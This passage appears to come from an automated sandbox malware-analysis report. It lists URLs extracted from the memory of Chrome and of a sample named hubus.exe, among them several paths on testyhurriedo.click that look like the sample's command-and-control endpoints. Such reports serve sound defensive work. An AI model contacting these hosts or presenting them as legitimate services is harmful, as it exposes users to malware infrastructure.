                          Source: chrome.exe, 00000002.00000002.12187167502.00002D2402310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186742001.00002D2402290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186685247.00002D2402284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
                          Source: chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                          Source: chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
                          Source: chrome.exe, 00000002.00000002.12200163204.00002D24039C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.cm/?
                          Source: chrome.exe, 00000002.00000003.12142740466.00002D2403A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142698855.00002D2403A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195303310.00002D2403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189270703.00002D2402670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191479618.00002D2402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12190721731.00002D240298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188159693.00002D2402448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196995817.00002D2403384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196370294.00002D2403298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12188643734.00002D2402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?tid
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/signin-oidc
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comp_4x
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shinobi.jp
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197980545.00002D2403538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194010718.00002D2402E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapchat.com
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://storygize.net
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
                          Source: chrome.exe, 00000002.00000002.12183494614.00002D2000070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.0000000001586000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/3
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/D
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/api
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/apiO
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/pi
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://testyhurriedo.click/s
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
                          Source: chrome.exe, 00000002.00000002.12192872362.00002D2402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i
                          Source: chrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                          Source: chrome.exe, 00000002.00000002.12196370294.00002D2403298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weborama-tech.ru
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191342488.00002D2402A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
                          Source: chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ww.goog
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/
                          Source: chrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
                          Source: chrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198933834.00002D24036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.do
                          Source: chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12189891160.00002D24027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: chrome.exe, 00000002.00000002.12190286038.00002D24028A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                          Source: chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org
                          Source: chrome.exe, 00000002.00000002.12197378230.00002D2403424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12190286038.00002D24028A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.electronicexpress.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.etsy.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eyebuydirect.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fingerhut.com/cart/index
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.freepeople.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gamestop.com/cart/
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: chrome.exe, 00000002.00000002.12199412317.00002D240389C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191619755.00002D2402A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192872362.00002D2402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197335639.00002D2403414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195250217.00002D2403068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116608328.00002D2402C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12199453669.00002D24038AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195592726.00002D2403134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0B4
                          Source: chrome.exe, 00000002.00000002.12199495376.00002D24038E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                          Source: chrome.exe, 00000002.00000003.12121855837.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
